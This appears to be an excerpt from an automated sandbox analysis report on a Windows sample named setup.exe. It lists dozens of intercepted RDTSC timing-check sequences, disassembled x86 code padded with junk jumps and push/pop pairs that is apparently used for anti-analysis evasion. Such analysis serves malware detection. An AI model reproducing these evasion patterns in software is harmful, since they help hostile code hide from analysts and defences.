Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4C809B3 second address: 4C809B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4C809B7 second address: 4C809E1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDDE9067F6Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FDDE9067F75h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4C809E1 second address: 4C809E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4C809E7 second address: 4C809EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4C809EB second address: 4C80A14 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDDE8CE13E3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b and esp, FFFFFFF8h 0x0000000e pushad 0x0000000f mov di, ADC6h 0x00000013 popad 0x00000014 push eax 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4C80A14 second address: 4C80A18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4C80A18 second address: 4C80A1E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4C80A1E second address: 4C80A24 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4C80A24 second address: 4C80A28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4C80A28 second address: 4C80A87 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDDE9067F78h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], ebx 0x0000000e jmp 00007FDDE9067F70h 0x00000013 xchg eax, esi 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 pushfd 0x00000018 jmp 00007FDDE9067F6Dh 0x0000001d adc cx, 2736h 0x00000022 jmp 00007FDDE9067F71h 0x00000027 popfd 0x00000028 mov si, 3B27h 0x0000002c popad 0x0000002d rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4C80A87 second address: 4C80AA7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDDE8CE13DDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FDDE8CE13DCh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4C80AA7 second address: 4C80B64 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FDDE9067F71h 0x00000008 pushfd 0x00000009 jmp 00007FDDE9067F70h 0x0000000e add si, AFE8h 0x00000013 jmp 00007FDDE9067F6Bh 0x00000018 popfd 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c xchg eax, esi 0x0000001d pushad 0x0000001e call 00007FDDE9067F74h 0x00000023 pushfd 0x00000024 jmp 00007FDDE9067F72h 0x00000029 adc eax, 3D7CCD78h 0x0000002f jmp 00007FDDE9067F6Bh 0x00000034 popfd 0x00000035 pop esi 0x00000036 popad 0x00000037 mov esi, dword ptr [ebp+08h] 0x0000003a jmp 00007FDDE9067F6Bh 0x0000003f sub ebx, ebx 0x00000041 jmp 00007FDDE9067F6Fh 0x00000046 test esi, esi 0x00000048 push eax 0x00000049 push edx 0x0000004a pushad 0x0000004b pushfd 0x0000004c jmp 00007FDDE9067F6Bh 0x00000051 jmp 00007FDDE9067F73h 0x00000056 popfd 0x00000057 mov edx, eax 0x00000059 popad 0x0000005a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4C80B64 second address: 4C80BC3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDDE8CE13E5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007FDE5AF76BE7h 0x0000000f jmp 00007FDDE8CE13DEh 0x00000014 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000001b jmp 00007FDDE8CE13E0h 0x00000020 mov ecx, esi 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007FDDE8CE13E7h 0x00000029 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4C80BC3 second address: 4C80C17 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDDE9067F79h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007FDE5B2FD729h 0x0000000f jmp 00007FDDE9067F6Eh 0x00000014 test byte ptr [76FA6968h], 00000002h 0x0000001b jmp 00007FDDE9067F70h 0x00000020 jne 00007FDE5B2FD711h 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b popad 0x0000002c rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4C80C17 second address: 4C80C1D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4C80C1D second address: 4C80C51 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDDE9067F74h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov edx, dword ptr [ebp+0Ch] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FDDE9067F77h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4C80C51 second address: 4C80C8B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FDDE8CE13E5h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FDDE8CE13E8h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4C80C8B second address: 4C80C8F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4C80C8F second address: 4C80C95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4C80C95 second address: 4C80C9B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4C80C9B second address: 4C80C9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4C80C9F second address: 4C80CBC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FDDE9067F72h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4C80CBC second address: 4C80CC2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4C80CC2 second address: 4C80CC6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4C80CC6 second address: 4C80CD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4C80CD5 second address: 4C80CD9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4C80CD9 second address: 4C80CDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4C80CDF second address: 4C80CFB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDDE9067F78h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4C80CFB second address: 4C80D13 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDDE8CE13DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4C80D13 second address: 4C80D17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4C80D17 second address: 4C80D1B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4C80D1B second address: 4C80D21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4C80D21 second address: 4C80D41 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDDE8CE13DAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FDDE8CE13DDh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4C80D41 second address: 4C80D56 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDDE9067F71h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4C80D56 second address: 4C80D71 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDDE8CE13E1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e pop edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4C90F28 second address: 4C90F55 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDDE9067F79h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FDDE9067F6Dh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4C90C2D second address: 4C90C33 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4C90C33 second address: 4C90C37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4C90C37 second address: 4C90C46 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4C90C46 second address: 4C90C4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4C90C4A second address: 4C90C4E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4C90C4E second address: 4C90C54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4C90C54 second address: 4C90C6F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDDE8CE13E7h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4C90C6F second address: 4C90C7E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4C90C7E second address: 4C90C8F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDDE8CE13DDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4C90C8F second address: 4C90D03 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDDE9067F71h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FDDE9067F73h 0x00000013 adc ax, B97Eh 0x00000018 jmp 00007FDDE9067F79h 0x0000001d popfd 0x0000001e pushfd 0x0000001f jmp 00007FDDE9067F70h 0x00000024 jmp 00007FDDE9067F75h 0x00000029 popfd 0x0000002a popad 0x0000002b rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4C90D03 second address: 4C90D09 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4C90D09 second address: 4C90D0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4C90D0D second address: 4C90D4F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDDE8CE13E3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d pushad 0x0000000e mov di, si 0x00000011 push eax 0x00000012 push edx 0x00000013 pushfd 0x00000014 jmp 00007FDDE8CE13DEh 0x00000019 sub esi, 5410A938h 0x0000001f jmp 00007FDDE8CE13DBh 0x00000024 popfd 0x00000025 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4C90D4F second address: 4C90DA8 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FDDE9067F78h 0x00000008 or eax, 5DD92398h 0x0000000e jmp 00007FDDE9067F6Bh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 popad 0x00000017 pop ebp 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b pushfd 0x0000001c jmp 00007FDDE9067F72h 0x00000021 and ecx, 12AE4DF8h 0x00000027 jmp 00007FDDE9067F6Bh 0x0000002c popfd 0x0000002d rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4C90DA8 second address: 4C90DAC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4D10747 second address: 4D1074D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4D1074D second address: 4D1075E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDDE8CE13DDh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4D1075E second address: 4D10762 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4D10762 second address: 4D107CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esp 0x00000009 jmp 00007FDDE8CE13DAh 0x0000000e mov dword ptr [esp], ebp 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007FDDE8CE13DEh 0x00000018 adc si, E8F8h 0x0000001d jmp 00007FDDE8CE13DBh 0x00000022 popfd 0x00000023 pushad 0x00000024 jmp 00007FDDE8CE13E6h 0x00000029 mov eax, 59F3ACB1h 0x0000002e popad 0x0000002f popad 0x00000030 mov ebp, esp 0x00000032 push eax 0x00000033 push edx 0x00000034 jmp 00007FDDE8CE13E3h 0x00000039 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4D107CE second address: 4D107DE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov si, bx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebp 0x0000000c pushad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4D008CB second address: 4D008DF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push edx 0x00000006 pop eax 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov cx, dx 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4D008DF second address: 4D00904 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, CAE7h 0x00000007 jmp 00007FDDE9067F6Ch 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f xchg eax, ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FDDE9067F6Ah 0x00000019 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4D00904 second address: 4D0090A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4D0090A second address: 4D00910 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4D00910 second address: 4D00914 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4D00914 second address: 4D00918 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4D00918 second address: 4D00950 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a jmp 00007FDDE8CE13E4h 0x0000000f pop ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FDDE8CE13E7h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4D00950 second address: 4D00956 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4D00956 second address: 4D0095A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4D00837 second address: 4D00852 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, edx 0x00000005 mov edi, 1338239Eh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FDDE9067F6Bh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4CA024C second address: 4CA02D4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FDDE8CE13E7h 0x00000009 xor ah, FFFFFF8Eh 0x0000000c jmp 00007FDDE8CE13E9h 0x00000011 popfd 0x00000012 mov bx, ax 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 xchg eax, ebp 0x00000019 pushad 0x0000001a pushfd 0x0000001b jmp 00007FDDE8CE13E8h 0x00000020 sub eax, 66B4F538h 0x00000026 jmp 00007FDDE8CE13DBh 0x0000002b popfd 0x0000002c mov edx, eax 0x0000002e popad 0x0000002f mov ebp, esp 0x00000031 jmp 00007FDDE8CE13E2h 0x00000036 pop ebp 0x00000037 push eax 0x00000038 push edx 0x00000039 pushad 0x0000003a push eax 0x0000003b push edx 0x0000003c rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4CA02D4 second address: 4CA02DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov dh, FFh 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4D00C25 second address: 4D00C60 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bl, al 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a jmp 00007FDDE8CE13E7h 0x0000000f push dword ptr [ebp+0Ch] 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FDDE8CE13E5h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4D00C60 second address: 4D00C87 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDDE9067F71h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [ebp+08h] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FDDE9067F6Dh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4D00C87 second address: 4D00CE7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDDE8CE13E1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 call 00007FDDE8CE13D9h 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007FDDE8CE13DCh 0x00000015 jmp 00007FDDE8CE13E5h 0x0000001a popfd 0x0000001b jmp 00007FDDE8CE13E0h 0x00000020 popad 0x00000021 push eax 0x00000022 pushad 0x00000023 mov edi, 056F6054h 0x00000028 push eax 0x00000029 push edx 0x0000002a mov di, 5A3Eh 0x0000002e rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4D00CE7 second address: 4D00D0C instructions: 0x00000000 rdtsc 0x00000002 mov si, dx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FDDE9067F77h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4D00D0C second address: 4D00DA7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDDE8CE13E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FDDE8CE13E7h 0x00000012 add cx, 19AEh 0x00000017 jmp 00007FDDE8CE13E9h 0x0000001c popfd 0x0000001d pushad 0x0000001e pushad 0x0000001f popad 0x00000020 mov esi, 7104BED3h 0x00000025 popad 0x00000026 popad 0x00000027 mov dword ptr [esp+04h], eax 0x0000002b pushad 0x0000002c jmp 00007FDDE8CE13DFh 0x00000031 popad 0x00000032 pop eax 0x00000033 push eax 0x00000034 push edx 0x00000035 pushad 0x00000036 pushad 0x00000037 popad 0x00000038 pushfd 0x00000039 jmp 00007FDDE8CE13DCh 0x0000003e or si, ED88h 0x00000043 jmp 00007FDDE8CE13DBh 0x00000048 popfd 0x00000049 popad 0x0000004a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4D00DA7 second address: 4D00DBF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDDE9067F74h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 389C5A second address: 389C5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 389C5E second address: 389C70 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 jo 00007FDDE9067F81h 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 389E59 second address: 389E5F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4CB0484 second address: 4CB0505 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDDE9067F71h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov esi, 459AEA83h 0x00000010 push eax 0x00000011 push edi 0x00000012 pop eax 0x00000013 pop ebx 0x00000014 popad 0x00000015 push eax 0x00000016 jmp 00007FDDE9067F71h 0x0000001b xchg eax, ebp 0x0000001c pushad 0x0000001d mov edx, esi 0x0000001f jmp 00007FDDE9067F78h 0x00000024 popad 0x00000025 mov ebp, esp 0x00000027 jmp 00007FDDE9067F70h 0x0000002c push FFFFFFFEh 0x0000002e pushad 0x0000002f jmp 00007FDDE9067F6Eh 0x00000034 mov bx, ax 0x00000037 popad 0x00000038 push 2A7FAF91h 0x0000003d pushad 0x0000003e push eax 0x0000003f push edx 0x00000040 push eax 0x00000041 push edx 0x00000042 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4CB0505 second address: 4CB0509 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4CB0509 second address: 4CB050D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
